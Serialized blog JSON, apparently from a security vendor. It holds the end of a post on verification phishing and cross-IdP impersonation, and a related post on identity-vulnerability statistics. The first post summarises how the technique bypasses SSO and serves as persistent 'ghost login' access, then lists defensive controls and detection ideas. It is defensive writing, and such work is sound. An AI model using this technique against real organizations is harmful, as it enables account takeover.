Verification",[],{},{"nodeType":178,"data":182002,"content":182003},{},[182004],{"nodeType":173,"value":182005,"marks":182006,"data":182007},"Some applications will treat any login from a new device (typically a new browser without a specific cookie set) as requiring a verification code from the linked email account. Again, this isn’t full protection as it still allows a second verification phishing attack, but it is a significant mitigating factor.",[],{},{"nodeType":178,"data":182009,"content":182010},{},[182011],{"nodeType":173,"value":182012,"marks":182013,"data":182014},"An example of this with HubSpot is shown below:",[],{},{"nodeType":312,"data":182016,"content":182020},{"target":182017},{"sys":182018},{"id":182019,"type":317,"linkType":318},"4QcTjWAgv4w0LSqxXTw2CT",[],{"nodeType":231,"data":182022,"content":182023},{},[],{"nodeType":235,"data":182025,"content":182026},{},[182027],{"nodeType":173,"value":182028,"marks":182029,"data":182030},"4) Pinned authentication",[],{},{"nodeType":178,"data":182032,"content":182033},{},[182034],{"nodeType":173,"value":182035,"marks":182036,"data":182037},"This is probably the most effective default control that some SaaS apps implement. Once an account has been created, the original authentication method is pinned as being the only acceptable authentication method. Authenticating using a different method will produce an error that cannot be circumvented without using the original authentication method first.",[],{},{"nodeType":178,"data":182039,"content":182040},{},[182041],{"nodeType":173,"value":182042,"marks":182043,"data":182044},"We can see an example of this with Mailchimp below, where we can see after a successful authentication with our malicious Google account we receive an error to indicate that the account is not connected to Google and the original credentials must be used instead.",[],{},{"nodeType":312,"data":182046,"content":182050},{"target":182047},{"sys":182048},{"id":182049,"type":317,"linkType":318},"27b5V0Pmguo4rpwwHHSO7v",[],{"nodeType":231,"data":182052,"content":182053},{},[],{"nodeType":235,"data":182055,"content":182056},{},[182057],{"nodeType":173,"value":182058,"marks":182059,"data":182060},"5) Configurable controls",[],{},{"nodeType":178,"data":182062,"content":182063},{},[182064],{"nodeType":173,"value":182065,"marks":182066,"data":182067},"Many SaaS applications, even if they have no controls in place by default, allow administrators to lock the configuration down if they want to. For example, all supported authentication methods may work by default but it may be possible to disable these individually to ensure only the intended authentication method is possible.",[],{},{"nodeType":178,"data":182069,"content":182070},{},[182071],{"nodeType":173,"value":182072,"marks":182073,"data":182074},"For example, in the case of the Atlassian example we used earlier, it’s possible to disable third-party logins entirely in a basic subscription. More advanced controls over authentication are available using a separate Atlassian Guard subscription:",[],{},{"nodeType":312,"data":182076,"content":182080},{"target":182077},{"sys":182078},{"id":182079,"type":317,"linkType":318},"7JA8XMaUJsMcvqsQOLUTVQ",[],{"nodeType":312,"data":182082,"content":182086},{"target":182083},{"sys":182084},{"id":182085,"type":317,"linkType":318},"29n6vvFCjz3s667ESNdgW5",[],{"nodeType":178,"data":182088,"content":182089},{},[182090],{"nodeType":173,"value":182091,"marks":182092,"data":182093},"To give another example, a default Datadog instance may allow Google logins and so be vulnerable to cross-IdP impersonation if password logins or SAML-based SSO logins are normally used. However, an administrator can disable Google logins across the entire organization or on a per-user basis if they wish. ",[],{},{"nodeType":178,"data":182095,"content":182096},{},[182097,182101,182110],{"nodeType":173,"value":182098,"marks":182099,"data":182100},"Alternatively, if an administrator disables both Google and password-based logins then only SAML-based logins will be allowed. Datadog refers to this as ",[],{},{"nodeType":186,"data":182102,"content":182104},{"uri":182103},"https://docs.datadoghq.com/account_management/saml/",[182105],{"nodeType":173,"value":182106,"marks":182107,"data":182109},"‘SAML strict’",[182108],{"type":194},{},{"nodeType":173,"value":197,"marks":182111,"data":182112},[],{},{"nodeType":178,"data":182114,"content":182115},{},[182116],{"nodeType":173,"value":182117,"marks":182118,"data":182119},"This functionality is available without any separate subscriptions:",[],{},{"nodeType":312,"data":182121,"content":182125},{"target":182122},{"sys":182123},{"id":182124,"type":317,"linkType":318},"5RMHXJpjSgnZJJx8uf3214",[],{"nodeType":178,"data":182127,"content":182128},{},[182129],{"nodeType":173,"value":182130,"marks":182131,"data":182132},"To give credit where it’s due, it’s worth noting that the examples we’ve used in this blog post offer ways of mitigating this attack – but this isn’t always the case. Many more apps don’t offer this kind of in-app control, leaving customers exposed.  ",[],{},{"nodeType":231,"data":182134,"content":182135},{},[],{"nodeType":169,"data":182137,"content":182138},{},[182139],{"nodeType":173,"value":182140,"marks":182141,"data":182142},"What steps can SaaS customers take to protect against this threat?",[],{},{"nodeType":178,"data":182144,"content":182145},{},[182146],{"nodeType":173,"value":182147,"marks":182148,"data":182149},"In an ideal world, all SaaS vendors would only support the strongest authentication methods available, default to pinning authentication to the first method used for an account, and allow administrators to flexibly configure authentication rules where required. ",[],{},{"nodeType":178,"data":182151,"content":182152},{},[182153],{"nodeType":173,"value":182154,"marks":182155,"data":182156},"But we don’t live in an ideal world. Many SaaS apps don’t even support SSO and the overwhelming majority of them default to single-factor authentication when users sign up. So how can the average organizations stop their strong SSO controls from being bypassed using cross-IdP impersonation and verification phishing?",[],{},{"nodeType":178,"data":182158,"content":182159},{},[182160],{"nodeType":173,"value":182161,"marks":182162,"data":182163},"Luckily, there are some pragmatic options to significantly increase resilience to these attacks.",[],{},{"nodeType":231,"data":182165,"content":182166},{},[],{"nodeType":235,"data":182168,"content":182169},{},[182170],{"nodeType":173,"value":182171,"marks":182172,"data":182173},"Lock your domain with other IdPs",[],{},{"nodeType":178,"data":182175,"content":182176},{},[182177],{"nodeType":173,"value":182178,"marks":182179,"data":182180},"Some IdPs allow you to register and lock your domain with them in order to prevent the creation of personal accounts with them. Apple is one example where you can lock your domain using Apple Business Manager. Maybe you aren’t an Apple user as an organization overall but you want to make sure nobody can create Apple accounts on your domain. Well, you can use this feature to entirely prevent this threat! (For Apple, at least.)",[],{},{"nodeType":312,"data":182182,"content":182185},{"target":182183},{"sys":182184},{"id":180107,"type":317,"linkType":318},[],{"nodeType":231,"data":182187,"content":182188},{},[],{"nodeType":235,"data":182190,"content":182191},{},[182192],{"nodeType":173,"value":182193,"marks":182194,"data":182195},"Create detection rules for verification emails from IdP vendors",[],{},{"nodeType":178,"data":182197,"content":182198},{},[182199],{"nodeType":173,"value":182200,"marks":182201,"data":182202},"There are a relatively small number of IdPs that account for the overwhelming majority of social login methods that can be used across a larger number of SaaS apps and the verification emails they send come from predictable addresses with predictable subjects and body formats.  ",[],{},{"nodeType":178,"data":182204,"content":182205},{},[182206],{"nodeType":173,"value":182207,"marks":182208,"data":182209},"Your threat hunting teams can create detection rules for this so you are alerted any time a verification request is made on a different IdP vendor. Whether this is from verification phishing, persistence mechanisms or just legitimate users creating shadow SaaS identities, it’s very easy for you to find out about it and then take actions accordingly.",[],{},{"nodeType":178,"data":182211,"content":182212},{},[182213,182217,182226,182230,182238],{"nodeType":173,"value":182214,"marks":182215,"data":182216},"Our friends at ",[],{},{"nodeType":186,"data":182218,"content":182220},{"uri":182219},"https://sublime.security/",[182221],{"nodeType":173,"value":182222,"marks":182223,"data":182225},"Sublime Security",[182224],{"type":194},{},{"nodeType":173,"value":182227,"marks":182228,"data":182229}," don't miss a beat, and have already ",[],{},{"nodeType":186,"data":182231,"content":182233},{"uri":182232},"https://github.com/sublime-security/sublime-rules/blob/8f8ef92f605f1bd87197315939beb0035c28869f/discovery-rules/new_account_verification_code.yml",[182234],{"nodeType":173,"value":182235,"marks":182236,"data":182237},"released a detection rule",[],{},{"nodeType":173,"value":182239,"marks":182240,"data":182241}," for this, allowing you to alert on new account creation emails for Apple, GitHub, Microsoft, Google, and Slack.",[],{},{"nodeType":231,"data":182243,"content":182244},{},[],{"nodeType":235,"data":182246,"content":182247},{},[182248],{"nodeType":173,"value":182249,"marks":182250,"data":182251},"Audit your SaaS applications for susceptibility to cross-IdP impersonation",[],{},{"nodeType":178,"data":182253,"content":182254},{},[182255],{"nodeType":173,"value":182256,"marks":182257,"data":182258},"Ok, this one is more work, as you might have hundreds of SaaS applications in use overall. It’s better to start with a shortlist of the most widely used and sensitive applications (you’re probably looking at 10 to 20 apps). ",[],{},{"nodeType":178,"data":182260,"content":182261},{},[182262,182266,182273],{"nodeType":173,"value":182263,"marks":182264,"data":182265},"Discovering all the applications in use across your organization and the login methods they use to them is the first part of the problem. It’s also common for multiple login methods to be in use for the same application, a problem known as ",[],{},{"nodeType":186,"data":182267,"content":182268},{"uri":4342},[182269],{"nodeType":173,"value":835,"marks":182270,"data":182272},[182271],{"type":194},{},{"nodeType":173,"value":182274,"marks":182275,"data":182276},". When you factor in how tricky it is to collect information on application accounts and login methods, and the mixed controls available to enforce the desired configuration in-app, This step is actually much harder than it sounds.",[],{},{"nodeType":178,"data":182278,"content":182279},{},[182280],{"nodeType":173,"value":182281,"marks":182282,"data":182283},"Once you have a list of applications, have your security teams create accounts with other IdPs and then see which of your SaaS applications allow them to login with cross-IdP impersonation, or otherwise which of the controls listed previously apply (e.g. email verification, device verification, pinned authentication etc).",[],{},{"nodeType":178,"data":182285,"content":182286},{},[182287],{"nodeType":173,"value":182288,"marks":182289,"data":182290},"Depending on the results of this, you can reduce vulnerability on an app-by-app basis. Where apps allow it through configuration, have the application owners configure your tenant to restrict authentication options. ",[],{},{"nodeType":178,"data":182292,"content":182293},{},[182294],{"nodeType":173,"value":182295,"marks":182296,"data":182297},"And if you find an application that does not support this feature then pressure the vendor with a feature request, the same as you might for a vendor that doesn’t support SSO.",[],{},{"nodeType":312,"data":182299,"content":182303},{"target":182300},{"sys":182301},{"id":182302,"type":317,"linkType":318},"6lsemiR9tRQ1eOPOh3rtfc",[],{"nodeType":231,"data":182305,"content":182306},{},[],{"nodeType":235,"data":182308,"content":182309},{},[182310],{"nodeType":173,"value":182311,"marks":182312,"data":182313},"Ask your red teams to add this technique to their attack simulations",[],{},{"nodeType":178,"data":182315,"content":182316},{},[182317],{"nodeType":173,"value":182318,"marks":182319,"data":182320},"Whether using internal or external red teams, proper adversarial simulation is key to understanding the realistic vulnerability of your organization to a range of attack scenarios. Next time you have a red team operation planned, ask them if they can attempt cross-IdP impersonation and verification phishing as part of an end-to-end attack chain to assess your vulnerability and detection and response controls appropriately. ",[],{},{"nodeType":178,"data":182322,"content":182323},{},[182324,182328,182336],{"nodeType":173,"value":182325,"marks":182326,"data":182327},"In fact, you should probably be asking them to be putting a huge focus on identity attacks in general. Ask them if they can use the ",[],{},{"nodeType":186,"data":182329,"content":182330},{"uri":88239},[182331],{"nodeType":173,"value":182332,"marks":182333,"data":182335},"open-source SaaS attacks matrix ",[182334],{"type":194},{},{"nodeType":173,"value":182337,"marks":182338,"data":182339},"as a basis for an identity attack focused red team operation.",[],{},{"nodeType":231,"data":182341,"content":182342},{},[],{"nodeType":169,"data":182344,"content":182345},{},[182346],{"nodeType":173,"value":40632,"marks":182347,"data":182348},[],{},{"nodeType":178,"data":182350,"content":182351},{},[182352],{"nodeType":173,"value":182353,"marks":182354,"data":182355},"We’ve seen how cross-IdP impersonation enables SaaS applications to be accessed using accounts outside the control of an organization and thus bypassing all controls enforced by SSO, such as:",[],{},{"nodeType":250,"data":182357,"content":182358},{},[182359,182369,182379,182389,182399],{"nodeType":254,"data":182360,"content":182361},{},[182362],{"nodeType":178,"data":182363,"content":182364},{},[182365],{"nodeType":173,"value":182366,"marks":182367,"data":182368},"Strong password requirements",[],{},{"nodeType":254,"data":182370,"content":182371},{},[182372],{"nodeType":178,"data":182373,"content":182374},{},[182375],{"nodeType":173,"value":182376,"marks":182377,"data":182378},"MFA",[],{},{"nodeType":254,"data":182380,"content":182381},{},[182382],{"nodeType":178,"data":182383,"content":182384},{},[182385],{"nodeType":173,"value":182386,"marks":182387,"data":182388},"Phishing-resistant authentication e.g. passkeys or Okta Fastpass",[],{},{"nodeType":254,"data":182390,"content":182391},{},[182392],{"nodeType":178,"data":182393,"content":182394},{},[182395],{"nodeType":173,"value":182396,"marks":182397,"data":182398},"IP/Location restrictions",[],{},{"nodeType":254,"data":182400,"content":182401},{},[182402],{"nodeType":178,"data":182403,"content":182404},{},[182405],{"nodeType":173,"value":182406,"marks":182407,"data":182408},"Authentication logs",[],{},{"nodeType":178,"data":182410,"content":182411},{},[182412],{"nodeType":173,"value":182413,"marks":182414,"data":182415},"During the initial access phase of an attack, combining cross-IdP impersonation with verification phishing can allow external attackers to gain permanent access to a range of downstream SaaS applications through the compromise of a single verification code, even if they are normally protected by a rock-solid SSO implementation.",[],{},{"nodeType":178,"data":182417,"content":182418},{},[182419],{"nodeType":173,"value":182420,"marks":182421,"data":182422},"During the persistence phase of a compromise, an attacker can utilize cross-IdP impersonation as an extremely powerful ghost login method in order to maintain access to a range of SaaS applications through a single mechanism, even if containment exercises later remove their access to the original SSO account or email inbox they compromised.",[],{},{"nodeType":178,"data":182424,"content":182425},{},[182426],{"nodeType":173,"value":182427,"marks":182428,"data":182429},"It is extremely important that organizations understand the threat these attacks pose, evaluate their vulnerability to these attacks and implement the prevention and detection controls provided above accordingly. ",[],{},{"nodeType":312,"data":182431,"content":182435},{"target":182432},{"sys":182433},{"id":182434,"type":317,"linkType":318},"3j4TX3jabfyWrhlXjo8ZHX",[],{"nodeType":178,"data":182437,"content":182438},{},[182439],{"nodeType":173,"value":37,"marks":182440,"data":182441},[],{},{"entries":182443},{"hyperlink":182444,"inline":182445,"block":182446},[],[],[182447,182454,182461,182467,182473,182477,182483,182490,182495,182501,182506,182512,182519,182526,182533,182536],{"sys":182448,"__typename":5345,"title":182449,"caption":182449,"layoutMode":118,"file":182450},{"id":181280},"Default Atlassian login page showing the range of social login methods available",{"url":182451,"width":182452,"height":182453},"https://images.ctfassets.net/y1cdw1ablpvd/7G7oxoeV5vQNAbOrjs7LWh/fc4570accb729c55c23186db302cd0f9/image10.png",397,516,{"sys":182455,"__typename":5345,"title":182456,"caption":182456,"layoutMode":118,"file":182457},{"id":181373},"Google email verification example",{"url":182458,"width":182459,"height":182460},"https://images.ctfassets.net/y1cdw1ablpvd/1j2a1rr1xZJs4jhgUMphQc/9b8e23fa928f15873b8cffed1cd7421e/image8.png",852,776,{"sys":182462,"__typename":5345,"title":182463,"caption":182463,"layoutMode":118,"file":182464},{"id":181506},"Pretext email example to perform verification phishing",{"url":182465,"width":182466,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/6tHP6GZWFDK38IMQHMWI5B/090ed3f69bf0479afde71001c13d8141/image3__1_.png",560,{"sys":182468,"__typename":5345,"title":182469,"caption":182469,"layoutMode":118,"file":182470},{"id":181579},"Slack social engineering example for verification phishing",{"url":182471,"width":91418,"height":182472},"https://images.ctfassets.net/y1cdw1ablpvd/1JFyQPB1Gk1HPCKxhh7Eus/e0a7c69d12e1374c0a3761a0b00eefce/image6.png",652,{"sys":182474,"__typename":15269,"type":15270,"ctaText":182475,"buttonLabel":15277,"buttonColour":72847,"buttonUrl":182476},{"id":181693},"Want to learn more about why AiTM attacks are so successful? Register for our webinar on Dec 5th to find out how phishing toolkits are getting through your detection controls.","https://pushsecurity.com/webinar/phish-kit-teardown",{"sys":182478,"__typename":127689,"title":182479,"youTubeUrl":182480,"imagePlaceholder":182481},{"id":180138},"Verification Phishing & Cross-IdP Impersonation Demo","https://www.youtube.com/watch?v=53JMEmZV6ck",{"url":182482,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/KXQAXbpFMRJprAkzoKhtx/ac370fb92687122022e753120bb7cb47/Slide_Front_Cover__20_.png",{"sys":182484,"__typename":5345,"title":182485,"caption":182486,"layoutMode":118,"file":182487},{"id":181983},"Adobe Google account linking and verification","Adobe Google account linking and verification (1)",{"url":182488,"width":182489,"height":158159},"https://images.ctfassets.net/y1cdw1ablpvd/3KeKxlgHPx3H2TbBd8WfQ1/ae1bdb07d43eaef106b74cd23752fbcf/image4.png",1436,{"sys":182491,"__typename":5345,"title":182492,"caption":182492,"layoutMode":118,"file":182493},{"id":181989},"Adobe Google account linking and verification (2)",{"url":182494,"width":182489,"height":158159},"https://images.ctfassets.net/y1cdw1ablpvd/6YVMDFtLttuF8E4g88G4la/b7dc3a4e37f5dd39c36ee739700e7048/image1.png",{"sys":182496,"__typename":5345,"title":182497,"caption":182497,"layoutMode":118,"file":182498},{"id":182019},"HubSpot unrecognized device email verification",{"url":182499,"width":182489,"height":182500},"https://images.ctfassets.net/y1cdw1ablpvd/1S8swPaBQ9K8PzU81NTphI/69bf04d6084e7df74b47f211d935d271/image7.png",824,{"sys":182502,"__typename":5345,"title":182503,"caption":182503,"layoutMode":118,"file":182504},{"id":182049},"Mailchimp pinned authentication requiring original login method",{"url":182505,"width":182489,"height":158159},"https://images.ctfassets.net/y1cdw1ablpvd/1fNIa9cZywrQ9CxuuZkWUA/b344fa67a49acb7f8fcd015517a4fc87/image11.png",{"sys":182507,"__typename":5345,"title":182508,"caption":182508,"layoutMode":118,"file":182509},{"id":182079},"Basic Atlassian authentication policies allowing third-party logins to be disabled",{"url":182510,"width":182511,"height":158159},"https://images.ctfassets.net/y1cdw1ablpvd/1SlxwxNhriIrLHho1acSsJ/99e99d1ec5445286fd42692a9d4772de/image12.png",1475,{"sys":182513,"__typename":5345,"title":182514,"caption":182514,"layoutMode":118,"file":182515},{"id":182085},"Atlassian Guard allows more advanced controls, including enforced SSO",{"url":182516,"width":182517,"height":182518},"https://images.ctfassets.net/y1cdw1ablpvd/716nNbqfT1A0xtWQPaFqp/e64839cb4c1eed8dcfe4d7460063fc53/image9.png",434,471,{"sys":182520,"__typename":5345,"title":182521,"caption":182521,"layoutMode":118,"file":182522},{"id":182124},"Datadog administrative screen for enabling/disabling login methods",{"url":182523,"width":182524,"height":182525},"https://images.ctfassets.net/y1cdw1ablpvd/4wwOBe1ojQ0noPXv1aWU8Q/df962016e42277e46454acd38baabef1/image5.png",935,620,{"sys":182527,"__typename":5345,"title":182528,"caption":182528,"layoutMode":118,"file":182529},{"id":180107},"Apple business manager update providing more options to manage verified domains",{"url":182530,"width":182531,"height":182532},"https://images.ctfassets.net/y1cdw1ablpvd/3NH2d6WMqAmPfrPMQas4e0/35676fdc69d7e91c3c1dd163fe3ff51d/image2.png",1394,942,{"sys":182534,"__typename":15269,"type":112637,"ctaText":182535,"buttonLabel":176108,"buttonColour":15273,"buttonUrl":473},{"id":182302},"See how Push helps you to find and fix vulnerable identities at-scale, by identifying applications, login methods, and insecure configurations",{"sys":182537,"__typename":15269,"type":15270,"ctaText":182538,"buttonLabel":154894,"buttonColour":72847,"buttonUrl":40823},{"id":182434},"To read more about Cross-IdP impersonation and examples in the wild, check out this blog post","content:blog:a-new-class-of-phishing-verification-phishing-and-cross-idp-impersonation.json","blog/a-new-class-of-phishing-verification-phishing-and-cross-idp-impersonation.json","blog/a-new-class-of-phishing-verification-phishing-and-cross-idp-impersonation",{"_path":182543,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":182544,"ogImage":118,"summary":182546,"title":118098,"subtitle":118,"metaTitle":182557,"synopsis":118099,"hashTags":118,"publishedDate":118100,"slug":118101,"content":182558,"tagsCollection":182693,"relatedBlogPostsCollection":182697,"authorsCollection":184082,"_id":184086,"_type":5439,"_source":5440,"_file":184087,"_stem":184088,"_extension":5439},"/blog/why-im-joining-push-security-the-team-redefining-itdr",{"id":117943,"publishedAt":182545},"2024-11-21T09:30:33.913Z",{"json":182547},{"data":182548,"content":182549,"nodeType":165},{},[182550],{"data":182551,"content":182552,"nodeType":178},{},[182553],{"data":182554,"marks":182555,"value":182556,"nodeType":173},{},[],"I'm excited to announce my new role as Chief Revenue Officer at Push, the team bringing identity threat detection and response into every browser. ","Kevin Arsenault joins Push Security as Chief Revenue Officer",{"json":182559,"links":182688},{"data":182560,"content":182561,"nodeType":165},{},[182562,182568,182581,182587,182593,182599,182605,182611,182624,182630,182650,182666,182672],{"data":182563,"content":182564,"nodeType":178},{},[182565],{"data":182566,"marks":182567,"value":117954,"nodeType":173},{},[],{"data":182569,"content":182570,"nodeType":178},{},[182571,182574,182578],{"data":182572,"marks":182573,"value":117961,"nodeType":173},{},[],{"data":182575,"marks":182576,"value":117966,"nodeType":173},{},[182577],{"type":1646},{"data":182579,"marks":182580,"value":117970,"nodeType":173},{},[],{"data":182582,"content":182583,"nodeType":235},{},[182584],{"data":182585,"marks":182586,"value":117977,"nodeType":173},{},[],{"data":182588,"content":182589,"nodeType":178},{},[182590],{"data":182591,"marks":182592,"value":117984,"nodeType":173},{},[],{"data":182594,"content":182595,"nodeType":178},{},[182596],{"data":182597,"marks":182598,"value":117991,"nodeType":173},{},[],{"data":182600,"content":182601,"nodeType":178},{},[182602],{"data":182603,"marks":182604,"value":117998,"nodeType":173},{},[],{"data":182606,"content":182607,"nodeType":178},{},[182608],{"data":182609,"marks":182610,"value":118005,"nodeType":173},{},[],{"data":182612,"content":182613,"nodeType":178},{},[182614,182617,182621],{"data":182615,"marks":182616,"value":118012,"nodeType":173},{},[],{"data":182618,"marks":182619,"value":118017,"nodeType":173},{},[182620],{"type":1646},{"data":182622,"marks":182623,"value":118021,"nodeType":173},{},[],{"data":182625,"content":182626,"nodeType":235},{},[182627],{"data":182628,"marks":182629,"value":118028,"nodeType":173},{},[],{"data":182631,"content":182632,"nodeType":178},{},[182633,182636,182640,182643,182647],{"data":182634,"marks":182635,"value":118035,"nodeType":173},{},[],{"data":182637,"marks":182638,"value":118040,"nodeType":173},{},[182639],{"type":1646},{"data":182641,"marks":182642,"value":118044,"nodeType":173},{},[],{"data":182644,"marks":182645,"value":118049,"nodeType":173},{},[182646],{"type":1646},{"data":182648,"marks":182649,"value":118053,"nodeType":173},{},[],{"data":182651,"content":182652,"nodeType":178},{},[182653,182656,182663],{"data":182654,"marks":182655,"value":118060,"nodeType":173},{},[],{"data":182657,"content":182658,"nodeType":186},{"uri":118063},[182659],{"data":182660,"marks":182661,"value":118069,"nodeType":173},{},[182662],{"type":194},{"data":182664,"marks":182665,"value":1477,"nodeType":173},{},[],{"data":182667,"content":182668,"nodeType":178},{},[182669],{"data":182670,"marks":182671,"value":118079,"nodeType":173},{},[],{"data":182673,"content":182674,"nodeType":178},{},[182675,182678,182685],{"data":182676,"marks":182677,"value":118086,"nodeType":173},{},[],{"data":182679,"content":182680,"nodeType":186},{"uri":118089},[182681],{"data":182682,"marks":182683,"value":117876,"nodeType":173},{},[182684],{"type":194},{"data":182686,"marks":182687,"value":1477,"nodeType":173},{},[],{"entries":182689},{"hyperlink":182690,"block":182691,"inline":182692},[],[],[],{"items":182694},[182695],{"sys":182696,"name":117242},{"id":117241},{"items":182698},[182699,183017,183303],{"__typename":1528,"sys":182700,"content":182702,"title":183003,"synopsis":183004,"hashTags":118,"publishedDate":183005,"slug":183006,"tagsCollection":183007,"authorsCollection":183013},{"id":182701},"2oCKAlWLSHMLeZF6j8YniH",{"json":182703},{"nodeType":165,"data":182704,"content":182705},{},[182706,182713,182720,182727,182734,182741,182748,182755,182760,182767,182774,182781,182788,182795,182815,182822,182829,182846,182853,182864,182871,182900,182907,182914,182921,182928,182933,182940,182947,182954,182961,182968,182974,182992,182997],{"nodeType":178,"data":182707,"content":182708},{},[182709],{"nodeType":173,"value":182710,"marks":182711,"data":182712},"There are many factors that can make a user account vulnerable to identity-based attack techniques. Using Push data, we calculated how many vulnerable identities the average organization has, showing how different vulnerabilities leave an identity exposed to different methods of account takeover. ",[],{},{"nodeType":169,"data":182714,"content":182715},{},[182716],{"nodeType":173,"value":182717,"marks":182718,"data":182719},"Our dataset",[],{},{"nodeType":178,"data":182721,"content":182722},{},[182723],{"nodeType":173,"value":182724,"marks":182725,"data":182726},"This analysis is based on a snapshot of when organizations begin using the Push platform, once enrollment has completed. Data from trial and partially deployed organizations is excluded. ",[],{},{"nodeType":178,"data":182728,"content":182729},{},[182730],{"nodeType":173,"value":182731,"marks":182732,"data":182733},"Early adopters of new identity security products like Push are likely to have a higher than average level of maturity in this area – even prior to using Push. So, the findings may not be accurate for all organizations, particularly those with lower awareness of identity security challenges. ",[],{},{"nodeType":178,"data":182735,"content":182736},{},[182737],{"nodeType":173,"value":182738,"marks":182739,"data":182740},"It’s also worth noting that passwordless authentication makes up a very small percentage of the overall authentication factors detected. If you’re in the minority of organizations that have widely adopted something like passkeys or biometric authentication, your identity posture will probably look quite different. But, you should still be wary of backup phishable factors and SSO gaps – more on this below.",[],{},{"nodeType":169,"data":182742,"content":182743},{},[182744],{"nodeType":173,"value":182745,"marks":182746,"data":182747},"Identity configurations and how they can be exploited",[],{},{"nodeType":178,"data":182749,"content":182750},{},[182751],{"nodeType":173,"value":182752,"marks":182753,"data":182754},"We analyzed a sample dataset of 300,000 accounts and the associated login methods – this is what we found. ",[],{},{"nodeType":312,"data":182756,"content":182759},{"target":182757},{"sys":182758},{"id":71430,"type":317,"linkType":318},[],{"nodeType":178,"data":182761,"content":182762},{},[182763],{"nodeType":173,"value":182764,"marks":182765,"data":182766},"Some of the key insights are explored below. ",[],{},{"nodeType":235,"data":182768,"content":182769},{},[182770],{"nodeType":173,"value":182771,"marks":182772,"data":182773},"Organizations are using more apps and identities than they realize",[],{},{"nodeType":178,"data":182775,"content":182776},{},[182777],{"nodeType":173,"value":182778,"marks":182779,"data":182780},"On average, each employee has ~15 identities tied to the business apps that they use, and each organization uses ~220 apps. The number of apps per organization doesn't show a strong correlation with the size of the organization. But, the number of accounts per user does tend to be lower for organizations with a larger employee base. ",[],{},{"nodeType":235,"data":182782,"content":182783},{},[182784],{"nodeType":173,"value":182785,"marks":182786,"data":182787},"Many accounts lack the most basic protections",[],{},{"nodeType":178,"data":182789,"content":182790},{},[182791],{"nodeType":173,"value":182792,"marks":182793,"data":182794},"37% of all accounts do not have MFA set, while ~9% of accounts with a password also have a breached, weak, or reused password, making them highly susceptible to account takeover. ",[],{},{"nodeType":178,"data":182796,"content":182797},{},[182798,182802,182811],{"nodeType":173,"value":182799,"marks":182800,"data":182801},"This might not seem that high at face value – but it’s enough that attackers can feasibly take over accounts linked to every business app used in the organization just by abusing password vulnerabilities through attacks like ",[],{},{"nodeType":186,"data":182803,"content":182805},{"uri":182804},"https://pushsecurity.com/blog/what-is-credential-stuffing/",[182806],{"nodeType":173,"value":182807,"marks":182808,"data":182810},"credential stuffing",[182809],{"type":194},{},{"nodeType":173,"value":182812,"marks":182813,"data":182814},". For a 1,000 user organization, this leaves them with 1,367 user accounts that are highly vulnerable to account takeover.",[],{},{"nodeType":178,"data":182816,"content":182817},{},[182818],{"nodeType":173,"value":182819,"marks":182820,"data":182821},"The situation gets worse when a password is the sole login method set, with these accounts lacking MFA in 4 out of 5 cases. ",[],{},{"nodeType":235,"data":182823,"content":182824},{},[182825],{"nodeType":173,"value":182826,"marks":182827,"data":182828},"SSO is not a silver bullet",[],{},{"nodeType":178,"data":182830,"content":182831},{},[182832,182836,182843],{"nodeType":173,"value":182833,"marks":182834,"data":182835},"SSO can be used to reduce an organization's susceptibility to password-based attacks, but the vast majority (97%) of SSO logins track back to an original password login to an IdP (due to the marginal use of passwordless authentication) while in 10% of cases a local password login is set alongside SSO – potentially introducing ",[],{},{"nodeType":186,"data":182837,"content":182838},{"uri":4342},[182839],{"nodeType":173,"value":835,"marks":182840,"data":182842},[182841],{"type":194},{},{"nodeType":173,"value":1477,"marks":182844,"data":182845},[],{},{"nodeType":178,"data":182847,"content":182848},{},[182849],{"nodeType":173,"value":182850,"marks":182851,"data":182852},"You might expect these password-based logins to be highly scrutinized due to the criticality of these accounts – but we found that 1 in 5 IdP accounts is missing MFA, and a non-unique password is present for 10% of IdP accounts (meaning that if the same username and password combination is compromised on another app, the risk of a lateral account compromise is much higher). ",[],{},{"nodeType":178,"data":182854,"content":182855},{},[182856,182860],{"nodeType":173,"value":182857,"marks":182858,"data":182859},"Since Microsoft, Okta, and Google IdP accounts are the most targeted identities by attackers due to their value if compromised, these accounts are under a huge amount of pressure from attackers – ",[],{},{"nodeType":173,"value":182861,"marks":182862,"data":182863},"multiplying the risk to single factor authentication IdP accounts.",[],{},{"nodeType":235,"data":182865,"content":182866},{},[182867],{"nodeType":173,"value":182868,"marks":182869,"data":182870},"Pretty much all identities can be phished",[],{},{"nodeType":178,"data":182872,"content":182873},{},[182874,182878,182886,182890,182896],{"nodeType":173,"value":182875,"marks":182876,"data":182877},"Almost all identities (~99%) are susceptible to phishing attacks – either because MFA is missing, or the types of MFA implemented are weak to modern phishing attacks such as ",[],{},{"nodeType":186,"data":182879,"content":182880},{"uri":49844},[182881],{"nodeType":173,"value":182882,"marks":182883,"data":182885},"Adversary in the Middle (AitM) phishing kits",[182884],{"type":194},{},{"nodeType":173,"value":182887,"marks":182888,"data":182889},", or techniques such as ",[],{},{"nodeType":186,"data":182891,"content":182892},{"uri":775},[182893],{"nodeType":173,"value":778,"marks":182894,"data":182895},[],{},{"nodeType":173,"value":182897,"marks":182898,"data":182899},". The most common MFA methods are phone call, push notification, and one-time passcode – all of which are phishable or bypassable. ",[],{},{"nodeType":178,"data":182901,"content":182902},{},[182903],{"nodeType":173,"value":182904,"marks":182905,"data":182906},"Even in the small number of cases where we identified a passwordless authentication method that is regarded as phishing-resistant (e.g. passkeys, biometrics, etc.) there is a backup, phishable method set for over half of them. ",[],{},{"nodeType":169,"data":182908,"content":182909},{},[182910],{"nodeType":173,"value":182911,"marks":182912,"data":182913},"So... what does this mean in real terms? ",[],{},{"nodeType":178,"data":182915,"content":182916},{},[182917],{"nodeType":173,"value":182918,"marks":182919,"data":182920},"The main conclusion from the data is that identity vulnerabilities exist almost everywhere. Some are certainly more likely to be exploited than others (e.g. an account with a reused password and no MFA is a higher risk than an account with MFA) but attackers have the means to take over most accounts using widely available tooling and know-how. ",[],{},{"nodeType":178,"data":182922,"content":182923},{},[182924],{"nodeType":173,"value":182925,"marks":182926,"data":182927},"To bring this to life, here’s an infographic representing the identity attack surface for a 1,000 seat organization. ",[],{},{"nodeType":312,"data":182929,"content":182932},{"target":182930},{"sys":182931},{"id":27078,"type":317,"linkType":318},[],{"nodeType":178,"data":182934,"content":182935},{},[182936],{"nodeType":173,"value":182937,"marks":182938,"data":182939},"This shows that investing in your identity security baseline only gets you so far – ultimately, you 